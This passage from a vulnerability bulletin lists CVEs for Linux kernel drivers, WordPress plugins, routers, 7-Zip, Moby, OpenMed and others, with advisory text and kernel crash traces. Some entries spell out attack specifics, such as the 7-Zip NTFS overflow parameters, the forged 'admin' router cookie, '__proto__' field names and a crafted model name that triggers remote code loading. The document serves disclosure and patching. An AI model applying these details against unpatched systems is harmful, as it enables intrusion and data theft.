CPU#4: sync/703 [87.8285] CPU: 4 UID: 0 PID: 703 Comm: sync Not tainted 6.18.0 #25 PREEMPT(none) [87.8287] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.17.0-4.fc41 0 ---truncated--- | 2026-06-03 | 8.4 | CVE-2026-46251 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/pf: Fix sysfs initialization In case of devm_add_action_or_reset() failure the provided cleanup action will be run immediately on the not yet initialized kobject. This may lead to errors like: [ ] kobject: '(null)' (ff110001393608e0): is not initialized, yet kobject_put() is being called. [ ] WARNING: lib/kobject.c:734 at kobject_put+0xd9/0x250, CPU#0: kworker/0:0/9 [ ] RIP: 0010:kobject_put+0xdf/0x250 [ ] Call Trace: [ ] xe_sriov_pf_sysfs_init+0x21/0x100 [xe] [ ] xe_sriov_pf_init_late+0x87/0x2b0 [xe] [ ] xe_sriov_init_late+0x5f/0x2c0 [xe] [ ] xe_device_probe+0x5f2/0xc20 [xe] [ ] xe_pci_probe+0x396/0x610 [xe] [ ] local_pci_probe+0x47/0xb0 [ ] refcount_t: underflow; use-after-free. [ ] WARNING: lib/refcount.c:28 at refcount_warn_saturate+0x68/0xb0, CPU#0: kworker/0:0/9 [ ] RIP: 0010:refcount_warn_saturate+0x68/0xb0 [ ] Call Trace: [ ] kobject_put+0x174/0x250 [ ] xe_sriov_pf_sysfs_init+0x21/0x100 [xe] [ ] xe_sriov_pf_init_late+0x87/0x2b0 [xe] [ ] xe_sriov_init_late+0x5f/0x2c0 [xe] [ ] xe_device_probe+0x5f2/0xc20 [xe] [ ] xe_pci_probe+0x396/0x610 [xe] [ ] local_pci_probe+0x47/0xb0 Fix that by calling kobject_init() and kobject_add() separately and register cleanup action after the kobject is initialized. Also make this cleanup registration a part of the create helper to fix another mistake, as in the loop we were wrongly passing parent kobject while registering cleanup action, and this resulted in some undetected leaks. (cherry picked from commit 98b16727f07e26a5d4de84d88805ce7ffcfdd324) | 2026-06-03 | 8.8 | CVE-2026-46264 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: rt9455: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-06-03 | 8.4 | CVE-2026-46270 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ibmveth: Disable GSO for packets with small MSS Some physical adapters on Power systems do not support segmentation offload when the MSS is less than 224 bytes. Attempting to send such packets causes the adapter to freeze, stopping all traffic until manually reset. Implement ndo_features_check to disable GSO for packets with small MSS values. The network stack will perform software segmentation instead. The 224-byte minimum matches ibmvnic commit <f10b09ef687f> ("ibmvnic: Enforce stronger sanity checks on GSO packets") which uses the same physical adapters in SEA configurations. The issue occurs specifically when the hardware attempts to perform segmentation (gso_segs > 1) with a small MSS. Single-segment GSO packets (gso_segs == 1) do not trigger the problematic LSO code path and are transmitted normally without segmentation. Add an ndo_features_check callback to disable GSO when MSS < 224 bytes. Also call vlan_features_check() to ensure proper handling of VLAN packets, particularly QinQ (802.1ad) configurations where the hardware parser may not support certain offload features. Validated using iptables to force small MSS values. Without the fix, the adapter freezes. With the fix, packets are segmented in software and transmission succeeds. Comprehensive regression testing completed (MSS tests, performance, stability). | 2026-06-03 | 8.6 | CVE-2026-46273 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: reject userspace cifs.spnego descriptions cifs.spnego key descriptions contain authority-bearing fields such as pid, uid, creduid, and upcall_target that cifs.upcall treats as kernel-originating inputs. However, userspace can also create keys of this type through request_key(2) or add_key(2), allowing those fields to be supplied without CIFS origin. Only accept cifs.spnego descriptions while CIFS is using its private spnego_cred to request the key. | 2026-06-01 | 7.1 | CVE-2026-46243 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: Work around LLVM bug when gp is used as global register variable On MIPS, __current_thread_info is defined as global register variable locating in $gp, and is simply assigned with new address during kernel relocation. This however is broken with LLVM, which always restores $gp if it finds $gp is clobbered in any form, including when intentionally through a global register variable. This is against GCC's documentation[1], which requires a callee-saved register used as global register variable not to be restored if it's clobbered. As a result, $gp will continue to point to the unrelocated kernel after the epilog of relocate_kernel(), leading to an early crash in init_idle, [ 0.000000] CPU 0 Unable to handle kernel paging request at virtual address 0000000000000000, epc == ffffffff81afada8, ra == ffffffff81afad90 [ 0.000000] Oops[#1]: [ 0.000000] CPU: 0 UID: 0 PID: 0 Comm: swapper Tainted: G W 6.19.0-rc5-00262-gd3eeb99bbc99-dirty #188 VOLUNTARY [ 0.000000] Tainted: [W]=WARN [ 0.000000] Hardware name: loongson,loongson64v-4core-virtio [ 0.000000] $ 0 : 0000000000000000 0000000000000000 0000000000000001 0000000000000000 [ 0.000000] $ 4 : ffffffff80b80ec0 ffffffff80b53d48 0000000000000000 00000000000f4240 [ 0.000000] $ 8 : 0000000000000100 ffffffff81d82f80 ffffffff81d82f80 0000000000000001 [ 0.000000] $12 : 0000000000000000 ffffffff81776f58 00000000000005da 0000000000000002 [ 0.000000] $16 : ffffffff80b80e40 0000000000000000 ffffffff80b81614 9800000005dfbe80 [ 0.000000] $20 : 00000000540000e0 ffffffff81980000 0000000000000000 ffffffff80f81c80 [ 0.000000] $24 : 0000000000000a26 ffffffff8114fb90 [ 0.000000] $28 : ffffffff80b50000 ffffffff80b53d40 0000000000000000 ffffffff81afad90 [ 0.000000] Hi : 0000000000000000 [ 0.000000] Lo : 0000000000000000 [ 0.000000] epc : ffffffff81afada8 init_idle+0x130/0x270 [ 0.000000] ra : ffffffff81afad90 init_idle+0x118/0x270 [ 0.000000] Status: 540000e2 KX SX UX KERNEL EXL [ 0.000000] Cause : 00000008 (ExcCode 02) [ 0.000000] BadVA : 0000000000000000 [ 0.000000] PrId : 00006305 (ICT Loongson-3) [ 0.000000] Process swapper (pid: 0, threadinfo=(____ptrval____), task=(____ptrval____), tls=0000000000000000) [ 0.000000] Stack : 9800000005dfbf00 ffffffff8178e950 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 ffffffff81970000 000000000000003f ffffffff810a6528 [ 0.000000] 0000000000000001 9800000005dfbe80 9800000005dfbf00 ffffffff81980000 [ 0.000000] ffffffff810a6450 ffffffff81afb6c0 0000000000000000 ffffffff810a2258 [ 0.000000] ffffffff81d82ec8 ffffffff8198d010 ffffffff81b67e80 ffffffff8197dd98 [ 0.000000] ffffffff81d81c80 ffffffff81930000 0000000000000040 0000000000000000 [ 0.000000] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 000000000000009e ffffffff9fc01000 0000000000000000 [ 0.000000] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 ffffffff81ae86dc ffffffff81b3c741 0000000000000002 [ 0.000000] ... [ 0.000000] Call Trace: [ 0.000000] [<ffffffff81afada8>] init_idle+0x130/0x270 [ 0.000000] [<ffffffff81afb6c0>] sched_init+0x5c8/0x6c0 [ 0.000000] [<ffffffff81ae86dc>] start_kernel+0x27c/0x7a8 This bug has been reported to LLVM[2] and affects version from (at least) 18 to 21. Let's work around this by using inline assembly to assign $gp before a fix is widely available. | 2026-06-03 | 7.3 | CVE-2026-46250 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pstore/ram: fix buffer overflow in persistent_ram_save_old() persistent_ram_save_old() can be called multiple times for the same persistent_ram_zone (e.g., via ramoops_pstore_read -> ramoops_get_next_prz for PSTORE_TYPE_DMESG records). Currently, the function only allocates prz->old_log when it is NULL, but it unconditionally updates prz->old_log_size to the current buffer size and then performs memcpy_fromio() using this new size. If the buffer size has grown since the first allocation (which can happen across different kernel boot cycles), this leads to: 1. A heap buffer overflow (OOB write) in the memcpy_fromio() calls 2. A subsequent OOB read when ramoops_pstore_read() accesses the buffer using the incorrect (larger) old_log_size The KASAN splat would look similar to: BUG: KASAN: slab-out-of-bounds in ramoops_pstore_read+0x... Read of size N at addr ... by task ... The conditions are likely extremely hard to hit: 0. Crash with a ramoops write of less-than-record-max-size bytes. 1. Reboot: ramoops registers, pstore_get_records(0) reads old crash, allocates old_log with size X 2. Crash handler registered, timer started (if pstore_update_ms >= 0) 3. Oops happens (non-fatal, system continues) 4. pstore_dump() writes oops via ramoops_pstore_write() size Y (>X) 5. pstore_new_entry = 1, pstore_timer_kick() called 6. System continues running (not a panic oops) 7. Timer fires after pstore_update_ms milliseconds 8. pstore_timefunc() → schedule_work() → pstore_dowork() → pstore_get_records(1) 9. ramoops_get_next_prz() → persistent_ram_save_old() 10. buffer_size() returns Y, but old_log is X bytes 11. Y > X: memcpy_fromio() overflows heap Requirements: - a prior crash record exists that did not fill the record size (almost impossible since the crash handler writes as much as it can possibly fit into the record, capped by max record size and the kmsg buffer almost always exceeds the max record size) - pstore_update_ms >= 0 (disabled by default) - Non-fatal oops (system survives) Free and reallocate the buffer when the new size differs from the previously allocated size. This ensures old_log always has sufficient space for the data being copied. | 2026-06-03 | 7.8 | CVE-2026-46253 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: procfs: fix missing RCU protection when reading real_parent in do_task_stat() When reading /proc/[pid]/stat, do_task_stat() accesses task->real_parent without proper RCU protection, which leads to: cpu 0 cpu 1 ----- ----- do_task_stat var = task->real_parent release_task call_rcu(delayed_put_task_struct) task_tgid_nr_ns(var) rcu_read_lock <--- Too late to protect task->real_parent! task_pid_ptr <--- UAF! rcu_read_unlock This patch uses task_ppid_nr_ns() instead of task_tgid_nr_ns() to add proper RCU protection for accessing task->real_parent. | 2026-06-03 | 7.8 | CVE-2026-46259 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix out-of-bound access in fib6_add_rt2node(). syzbot reported out-of-bound read in fib6_add_rt2node(). [0] When IPv6 route is created with RTA_NH_ID, struct fib6_info does not have the trailing struct fib6_nh. The cited commit started to check !iter->fib6_nh->fib_nh_gw_family to ensure that rt6_qualify_for_ecmp() will return false for iter. If iter->nh is not NULL, rt6_qualify_for_ecmp() returns false anyway. Let's check iter->nh before reading iter->fib6_nh and avoid OOB read. [0]: BUG: KASAN: slab-out-of-bounds in fib6_add_rt2node+0x349c/0x3500 net/ipv6/ip6_fib.c:1142 Read of size 1 at addr ffff8880384ba6de by task syz.0.18/5500 CPU: 0 UID: 0 PID: 5500 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xba/0x230 mm/kasan/report.c:482 kasan_report+0x117/0x150 mm/kasan/report.c:595 fib6_add_rt2node+0x349c/0x3500 net/ipv6/ip6_fib.c:1142 fib6_add_rt2node_nh net/ipv6/ip6_fib.c:1363 [inline] fib6_add+0x910/0x18c0 net/ipv6/ip6_fib.c:1531 __ip6_ins_rt net/ipv6/route.c:1351 [inline] ip6_route_add+0xde/0x1b0 net/ipv6/route.c:3957 inet6_rtm_newroute+0x268/0x19e0 net/ipv6/route.c:5660 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa68/0xad0 net/socket.c:2592 ___sys_sendmsg+0x2a5/0x360 net/socket.c:2646 __sys_sendmsg net/socket.c:2678 [inline] __do_sys_sendmsg net/socket.c:2683 [inline] __se_sys_sendmsg net/socket.c:2681 [inline] __x64_sys_sendmsg+0x1bd/0x2a0 net/socket.c:2681 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f9316b9aeb9 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffd8809b678 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f9316e15fa0 RCX: 00007f9316b9aeb9 RDX: 0000000000000000 RSI: 0000200000004380 RDI: 0000000000000003 RBP: 00007f9316c08c1f R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f9316e15fac R14: 00007f9316e15fa0 R15: 00007f9316e15fa0 </TASK> Allocated by task 5499: kasan_save_stack mm/kasan/common.c:57 [inline] kasan_save_track+0x3e/0x80 mm/kasan/common.c:78 poison_kmalloc_redzone mm/kasan/common.c:398 [inline] __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:415 kasan_kmalloc include/linux/kasan.h:263 [inline] __do_kmalloc_node mm/slub.c:5657 [inline] __kmalloc_noprof+0x40c/0x7e0 mm/slub.c:5669 kmalloc_noprof include/linux/slab.h:961 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] fib6_info_alloc+0x30/0xf0 net/ipv6/ip6_fib.c:155 ip6_route_info_create+0x142/0x860 net/ipv6/route.c:3820 ip6_route_add+0x49/0x1b0 net/ipv6/route.c:3949 inet6_rtm_newroute+0x268/0x19e0 net/ipv6/route.c:5660 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa68/0xad0 net/socket.c:2592 ___sys_s ---truncated--- | 2026-06-03 | 7.8 | CVE-2026-46260 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix out-of-bounds stream encoder index v3 eng_id can be negative and that stream_enc_regs[] can be indexed out of bounds. eng_id is used directly as an index into stream_enc_regs[], which has only 5 entries. When eng_id is 5 (ENGINE_ID_DIGF) or negative, this can access memory past the end of the array. Add a bounds check using ARRAY_SIZE() before using eng_id as an index. The unsigned cast also rejects negative values. This avoids out-of-bounds access. Fixes the below smatch error: dcn*_resource.c: stream_encoder_create() may index stream_enc_regs[eng_id] out of bounds (size 5). drivers/gpu/drm/amd/amdgpu/../display/dc/resource/dcn351/dcn351_resource.c 1246 static struct stream_encoder *dcn35_stream_encoder_create( 1247 enum engine_id eng_id, 1248 struct dc_context *ctx) 1249 { ... 1255 1256 /* Mapping of VPG, AFMT, DME register blocks to DIO block instance */ 1257 if (eng_id <= ENGINE_ID_DIGF) { ENGINE_ID_DIGF is 5. should <= be <? Unrelated but, ugh, why is Smatch saying that "eng_id" can be negative? end_id is type signed long, but there are checks in the caller which prevent it from being negative. 1258 vpg_inst = eng_id; 1259 afmt_inst = eng_id; 1260 } else 1261 return NULL; 1262 ... 1281 1282 dcn35_dio_stream_encoder_construct(enc1, ctx, ctx->dc_bios, 1283 eng_id, vpg, afmt, --> 1284 &stream_enc_regs[eng_id], ^^^^^^^^^^^^^^^^^^^^^^^ This stream_enc_regs[] array has 5 elements so we are one element beyond the end of the array. ... 1287 return &enc1->base; 1288 } v2: use explicit bounds check as suggested by Roman/Dan; avoid unsigned int cast v3: The compiler already knows how to compare the two values, so the cast (int) is not needed. (Roman) | 2026-06-03 | 7.8 | CVE-2026-46263 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix WQ_MEM_RECLAIM warning When sunrpc is used, if a reset triggered, our wq may lead the following trace: workqueue: WQ_MEM_RECLAIM xprtiod:xprt_rdma_connect_worker [rpcrdma] is flushing !WQ_MEM_RECLAIM hns_roce_irq_workq:flush_work_handle [hns_roce_hw_v2] WARNING: CPU: 0 PID: 8250 at kernel/workqueue.c:2644 check_flush_dependency+0xe0/0x144 Call trace: check_flush_dependency+0xe0/0x144 start_flush_work.constprop.0+0x1d0/0x2f0 __flush_work.isra.0+0x40/0xb0 flush_work+0x14/0x30 hns_roce_v2_destroy_qp+0xac/0x1e0 [hns_roce_hw_v2] ib_destroy_qp_user+0x9c/0x2b4 rdma_destroy_qp+0x34/0xb0 rpcrdma_ep_destroy+0x28/0xcc [rpcrdma] rpcrdma_ep_put+0x74/0xb4 [rpcrdma] rpcrdma_xprt_disconnect+0x1d8/0x260 [rpcrdma] xprt_rdma_connect_worker+0xc0/0x120 [rpcrdma] process_one_work+0x1cc/0x4d0 worker_thread+0x154/0x414 kthread+0x104/0x144 ret_from_fork+0x10/0x18 Since QP destruction frees memory, this wq should have the WQ_MEM_RECLAIM. | 2026-06-03 | 7.5 | CVE-2026-46265 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: do WoW offloads only on primary link In case of multi-link connection, WCN7850 firmware crashes due to WoW offloads enabled on both primary and secondary links. Change to do it only on primary link to fix it. Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c5-00284-QCAHMTSWPL_V1.0_V2.0_SILICONZ-1 | 2026-06-03 | 7.8 | CVE-2026-46271 |
| Liquid Web / StellarWP--BookIt | Authentication Bypass Using an Alternate Path or Channel vulnerability in Liquid Web / StellarWP BookIt allows Password Recovery Exploitation. This issue affects BookIt: from n/a before 2.5.4.1. | 2026-06-02 | 7.5 | CVE-2026-40780 |
| Liquid Web / StellarWP--GiveWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liquid Web / StellarWP GiveWP allows DOM-Based XSS. This issue affects GiveWP: from n/a through 4.14.5. | 2026-06-01 | 7.1 | CVE-2026-42678 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains an unauthenticated stored cross-site scripting vulnerability in the log viewer that allows attackers to inject malicious scripts by exploiting unescaped template variables. Attackers can inject XSS payloads through search, lines, and path query parameters or by crafting values that get logged such as URLs, User-Agent headers, stream titles, or player names to execute arbitrary scripts in users' browsers. | 2026-06-05 | 7.2 | CVE-2026-50231 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through media file metadata tags like GENRE, ARTIST, and ALBUM. Attackers can craft files with XSS payloads in metadata tags that execute in the web interface when users view track information or play files, enabling access to management functions and settings disclosure. | 2026-06-05 | 7.2 | CVE-2026-50232 |
| LMS Community--Lyrion Music Server | Lyrion Music Server 9.2.0 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting directory traversal in the web server context. Attackers can manipulate file path parameters to access sensitive files outside the intended directory structure. | 2026-06-05 | 7.5 | CVE-2026-50234 |
| Logtivity Activity Logs--Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity | Insertion of Sensitive Information Into Sent Data vulnerability in Logtivity Activity Logs Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity allows Retrieve Embedded Sensitive Data. This issue affects Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity: from n/a through 3.3.6. | 2026-06-01 | 7.5 | CVE-2026-42673 |
| masaakitanaka--Booking Package | The Booking Package plugin for WordPress is vulnerable to Privilege Escalation via Account Takeover in versions up to, and including, 1.7.16. This is due to a missing capability check on the 'updateUser' branch of the package_app_action AJAX endpoint, where the handler only validates a nonce and the dispatcher invokes Schedule::updateUser() with the $administrator argument hard-coded to 1, bypassing the only owner-restriction check inside that function and allowing the target user to be determined solely by attacker-supplied input passed directly to wp_update_user(). This makes it possible for authenticated attackers, with Editor-level access and above, to change the email address and password of any account, including Administrator accounts, resulting in a full site takeover. | 2026-06-06 | 7.2 | CVE-2026-9851 |
| maziyarpanahi--openmed | OpenMed before 1.5.2 contains a remote code execution vulnerability in the PII privacy-filter model loading path. The privacy-filter dispatcher used broad substring matching on the user-supplied model_name parameter, allowing a value such as attacker/foo-privacy-filter-bar to route through a path that loads Hugging Face models with trust_remote_code=True. An unauthenticated attacker can supply a malicious model repository containing custom Transformers code via auto_map in config.json or tokenizer_config.json, which is imported and executed with the privileges of the OpenMed service process. | 2026-06-02 | 9.8 | CVE-2026-47117 |
| MBS--Single-A | An unauthenticated remote attacker can recover a default, hard coded password from a firmware image and thus gain full access to all affected devices. | 2026-06-03 | 9.8 | CVE-2026-35075 |
| MBS--Single-A | The bac-scanresult method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35076 |
| MBS--Single-A | The ugw-delete-file method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35077 |
| MBS--Single-A | The ugw-logstop method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35078 |
| MBS--Single-A | The ugw-restore method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35079 |
| MBS--Single-A | The ugw-restoreinfo method allows a remote attacker with user privileges to delete arbitrary local files due to insufficient validation of user-controlled input. | 2026-06-03 | 8.1 | CVE-2026-35080 |
| MBS--Single-A | The ugw-logstop method allows a remote attacker with user privileges to terminate arbitrary processes due to insufficient validation of user-supplied input. | 2026-06-03 | 8.1 | CVE-2026-35081 |
| MBS--Single-A | The ugw-logread method allows a remote attacker with user privileges to access arbitrary local files due to insufficient validation of user-supplied input. | 2026-06-03 | 8.8 | CVE-2026-35082 |
| MBS--Single-A | A remote attacker with user privileges can exploit a stack buffer overflow to gain full system access as root. | 2026-06-03 | 8.8 | CVE-2026-35083 |
| MBS--Single-A | A remote attacker with user privileges can exploit a stack buffer overflow in dali-devconfig to gain full system access as root. | 2026-06-03 | 8.8 | CVE-2026-35084 |
| MBS--Single-A | A remote attacker with user privileges can exploit a stack buffer overflow in gdv-serverconfig to gain full system access as root. | 2026-06-03 | 8.8 | CVE-2026-35085 |
| mcmilk--7-Zip | 7-Zip is a file archiver with a high compression ratio. Versions 26.00 and prior contain a heap buffer overflow vulnerability caused by an under-allocation in the NTFS compressed stream buffer (GetCuSize shift UB), potentially allowing attackers to cause arbitrary code execution or application crashes. CInStream::GetCuSize() in the NTFS handler computes the compression-unit buffer size as (UInt32)1 << (BlockSizeLog + CompressionUnit), and a crafted image with ClusterSizeLog >= 28 and CompressionUnit == 4 drives the exponent to 32, which is undefined behavior and collapses on x86/x64 so _inBuf is allocated as 1 byte. ReadStream_FALSE then writes up to 256 MB of attacker-controlled data into that 1-byte buffer in 64 KB iterations, and because the CInStream object sits only 304 bytes after _inBuf, its vtable pointer is overwritten and the next dispatched call achieves a vtable hijack. On 32-bit builds the overflow is unconditionally reached; on 64-bit it requires the parallel 8 GB _outBuf allocation to succeed, otherwise failing closed to denial of service. The NTFS handler is enabled by default in stock 7z.dll and, via signature-based fallback matching "NTFS " at offset 3, will open a crafted image regardless of file extension during extraction or testing. Version 26.01 fixes the issue. | 2026-06-05 | 8.8 | CVE-2026-48095 |
| mdjm--MDJM Event Management | The MDJM Event Management plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.7.8.3 via the mdjm_send_comm_email function. This is due to no file type, extension, or MIME type validation being performed on uploaded files. This makes it possible for authenticated attackers, with administrator-level access and above, to upload files that may be executable, which makes remote code execution possible. | 2026-06-06 | 7.2 | CVE-2026-7537 |
| medplum--medplum | Medplum before 5.1.14 contains a server-side request forgery vulnerability in the subscription worker that allows authenticated users to perform unauthorized internal network requests by creating FHIR Subscription resources with arbitrary endpoint URLs. Attackers can point subscription endpoints at internal addresses such as cloud instance metadata services, internal databases, or container orchestration endpoints to exfiltrate IAM credentials and patient health records via the POST body containing full FHIR resource payloads. | 2026-06-02 | 8.5 | CVE-2026-49120 |
| Microsoft--Azure HorizonDB | Authentication bypass by spoofing in Azure HorizonDB allows an unauthorized attacker to elevate privileges over a network. | 2026-06-04 | 10 | CVE-2026-48567 |
| Microsoft--Microsoft 365 Copilot | Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an authorized attacker to execute code over a network. | 2026-06-04 | 7.7 | CVE-2026-45497 |
| Microsoft--Microsoft Exchange Online | Improper authorization in Microsoft Exchange Online allows an unauthorized attacker to disclose information over a network. | 2026-06-04 | 9.1 | CVE-2026-48579 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-06-01 | 8 | CVE-2026-47294 |
| milamer--parse-nested-form-data | parse-nested-form-data is a tiny node module for parsing FormData by name into objects and arrays. Prior to version 1.0.1, parseFormData() walks bracket and dot-notation FormData field names into nested objects without filtering reserved property keys. A single FormData field whose name begins with __proto__, or contains .__proto__. mid-path, causes the parser to traverse onto Object.prototype and assign properties there, polluting the prototype chain of every plain object in the running process. This issue has been patched in version 1.0.1. | 2026-06-01 | 8.2 | CVE-2026-45302 |
| Mobatek--Mobatek MobaXterm | Mobatek MobaXterm 12.1 contains a structured exception handling (SEH) based buffer overflow vulnerability in the username field of session files that allows remote attackers to execute arbitrary code. Attackers can craft a malicious MobaXterm sessions file with overflow data that triggers the vulnerability when imported and executed, enabling reverse shell execution with user privileges. | 2026-06-04 | 9.8 | CVE-2019-25741 |
| moby--moby/v2/daemon | Moby is an open source container framework. In versions prior to 29.5.1 and in moby/moby v2 prior to v2.0.0-beta.14, when a compressed archive is uploaded to a container via `PUT /containers/{id}/archive` or piped through `docker cp -`, the daemon resolves decompression binaries (such as `xz` or `unpigz`) from the container's filesystem rather than the host's, due to incorrect ordering of operations. A malicious container image containing a trojanized decompression binary can achieve arbitrary code execution with full daemon privileges, including host root UID and unrestricted capabilities, when a user uploads a compressed (xz or gzip) archive into that container. This issue is fixed in Docker Engine 29.5.1 and moby/moby v2.0.0-beta.14. Workarounds include only running containers from trusted images, using authorization plugins to restrict access to the `PUT /containers/{id}/archive` endpoint, and avoiding piping compressed archives into containers created from untrusted images. | 2026-06-05 | 7.2 | CVE-2026-41567 |
| Mojoomla--School Management | Incorrect Privilege Assignment vulnerability in Mojoomla School Management allows Privilege Escalation. This issue affects School Management: from n/a through 93.2.0. | 2026-06-03 | 8.8 | CVE-2025-15656 |
| Mojoomla--School Management | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mojoomla School Management allows SQL Injection. This issue affects School Management: from n/a through 93.2.0. | 2026-06-03 | 7.6 | CVE-2025-15655 |
| Neterbit--NW-431F Router | Improper Authentication (Authentication Bypass) exists in Neterbit NW-431F Router 20241014-IR03 and before. The router uses a weak/predictable cookie value for authentication. By modifying the cookie value (e.g., setting it to "admin"), an attacker can bypass the authentication schema and gain unauthorized access to admin functionalities. | 2026-06-04 | 9.8 | CVE-2025-67446 |
| Neterbit--NW-431F Router | The network diagnosis (ping) module in Neterbit NW-431F Router 20241014-IR03 and before is vulnerable to OS command injection. The application does not properly sanitize user input in the IP address field before passing it to the system's ping command. An attacker can inject arbitrary OS commands, which will be executed with the privileges of the web server. | 2026-06-04 | 9.8 | CVE-2025-67447 |
| Neterbit--NW-431F Router | An issue in Neterbit NW-431F Router vNW-431F-20241014-IR03 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted command to the at_command.asp interface. | 2026-06-04 | 8.2 | CVE-2025-69755 |
| Neterbit--NW-431F Router | The SMS module in Neterbit NW-431F Router 20241014-IR03 and before is vulnerable to stored XSS. The application does not properly sanitize user input in SMS messages before storing and displaying them. An attacker can send an SMS containing a malicious XSS payload, which will be executed in the context of the victim's browser when the message is viewed. | 2026-06-04 | 7.1 | CVE-2025-67448 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 0.3.0 to before 3.1.0, 5.0.0 to before 5.1.0, and 6.0.0 to before 6.4.0, a missing signature verification in User OIDC allowed a malicious ID4me authority to identify as any user. This issue has been patched in versions 3.1.0, 4.1.0, 5.1.0, 6.4.0 and 8.3.0. | 2026-06-01 | 8.1 | CVE-2026-45156 |
